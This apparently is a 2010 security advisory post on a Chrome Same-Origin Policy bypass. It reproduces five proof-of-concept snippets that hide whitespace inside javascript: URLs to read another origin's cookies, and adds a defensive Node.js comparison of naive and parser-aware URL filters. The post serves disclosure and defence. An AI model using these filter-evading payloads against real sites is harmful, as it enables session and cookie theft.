Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL
Category: vulnerability/sop | Posted 2010-05-24 08:28
A Same-Origin Policy (SOP) bypass found in Google Chrome.
Once a browser's SOP can be bypassed, every site the user visits is effectively vulnerable to XSS: a page the attacker controls can run script in the context of any other origin the browser has open and read that origin's cookies and DOM, no matter how carefully the target site itself filters its input.
The PoC is as follows (source: http://www.exploit-db.com/exploits/12657). Each variant loads a cross-origin document (a Google account page) into a named iframe, then calls window.open() targeting that frame with a javascript: URL whose scheme has been broken up by an embedded tab, line feed or carriage return. A plain javascript: URL would be refused for a cross-origin frame, but with whitespace inside the scheme the check that should block the navigation does not recognise the string as javascript:, while the URL library that performs it (Google URL, GURL, as named in the title) strips the embedded whitespace and runs it as script, so alert(document.cookie) fires with the google.com document's cookies.
<!-- Variant 1: TAB inside the scheme, written as the JavaScript escape \u0009 -->
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\u0009ipt:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<!-- Variant 2: the same TAB, written as the hex escape \x09 -->
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\x09ipt:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<!-- Variant 3: line feed (\n) inside the scheme -->
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\nipt:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<!-- Variant 4: carriage return (\r) inside the scheme -->
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\ript:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<!-- Variant 5: TAB inside the scheme, written as the escape \t -->
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\tipt:alert(document.cookie)','test')" >Inject JavaScript</a>
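The PoC works because two pieces of code disagree about what scheme a string has once a tab, LF or CR is embedded in it. The same disagreement defeats any XSS filter that rejects links by matching the literal text "javascript:", because a WHATWG-conformant URL parser removes every ASCII tab and newline from its input before reading the scheme. The block below is an added example, not code from the original post or from exploit-db: it feeds the five escape forms used in the PoC (plus a plain javascript: URL and a benign https: URL, all constructed here) through a naive string check, through Node's built-in WHATWG URL parser, and through a hardened check that normalises the string the way the parser does before comparing the scheme. The function names and the probe list are this example's own; it assumes Node.js and needs no network access.

```javascript
// Added example (not from the original post or exploit-db 12657).
// Demonstrates the parser differential behind the PoC: a scheme check on the
// raw string and a WHATWG URL parser disagree about "javascr<TAB>ipt:" URLs.
// Runs under Node.js, whose global URL implements the WHATWG URL Standard.

// Constructed probe strings, one per escape form used in the PoC, plus two
// controls (a plain javascript: URL and a benign https: URL).
const PROBES = [
  'javascr\u0009ipt:alert(document.cookie)', // TAB via \u0009 escape (variant 1)
  'javascr\x09ipt:alert(document.cookie)',   // TAB via \x09 escape   (variant 2)
  'javascr\nipt:alert(document.cookie)',     // LF                     (variant 3)
  'javascr\ript:alert(document.cookie)',     // CR                     (variant 4)
  'javascr\tipt:alert(document.cookie)',     // TAB via \t escape      (variant 5)
  'javascript:alert(document.cookie)',       // control: no trick
  'https://www.google.com/accounts/ManageAccount?hl=fr', // control: benign
];

// Naive guard: what a filter that only looks at the raw string does.
// trim() removes leading/trailing whitespace but not the tab inside "javascr\tipt".
function naiveIsJavascriptUrl(s) {
  return s.trim().toLowerCase().startsWith('javascript:');
}

// What a WHATWG-conformant parser thinks the scheme is. The basic URL parser
// removes all ASCII tab and newline (U+0009, U+000A, U+000D) from the input
// before parsing, so "javascr\tipt:..." parses with protocol "javascript:".
function parsedScheme(s) {
  try {
    return new URL(s).protocol; // e.g. "javascript:" or "https:"
  } catch (e) {
    return null; // not parseable as an absolute URL
  }
}

// Hardened guard: strip exactly what the parser strips (tab/newline anywhere,
// leading C0 controls and space), then compare the scheme. Assumption: the
// caller wants to refuse javascript:, data: and vbscript: before handing the
// string to window.open(), location, or an href attribute.
const DANGEROUS_SCHEMES = ['javascript:', 'data:', 'vbscript:'];
function isDangerousUrl(s) {
  const normalised = String(s)
    .replace(/[\u0009\u000A\u000D]/g, '') // WHATWG: tab/newline removed anywhere
    .replace(/^[\u0000-\u0020]+/, '')     // WHATWG: leading C0 controls/space
    .toLowerCase();
  return DANGEROUS_SCHEMES.some((prefix) => normalised.startsWith(prefix));
}

// Run all three views over every probe and return the records so that they
// can be inspected or asserted on rather than only printed.
function compareChecks(probes = PROBES) {
  return probes.map((s) => ({
    input: JSON.stringify(s),
    naive: naiveIsJavascriptUrl(s),
    scheme: parsedScheme(s),
    hardened: isDangerousUrl(s),
  }));
}

// Number of probes that slip past the naive guard yet parse as javascript:
// (these are the strings a browser would execute as script).
function naiveBypasses(probes = PROBES) {
  return compareChecks(probes)
    .filter((r) => !r.naive && r.scheme === 'javascript:')
    .length;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.table(compareChecks());
  console.log('naive guard bypassed by', naiveBypasses(), 'of', PROBES.length, 'probes');
}
```

Run it with `node` and the table shows the five PoC strings evaluating to `naive: false` but `scheme: 'javascript:'`, which is exactly the gap the exploit walks through; the hardened check flags all six javascript: strings and passes the https: control. The practical rule for a defender is to never classify a URL by substring matching on the raw text: either parse it with the platform's URL parser and inspect the resulting protocol, or normalise it the way the parser will before comparing.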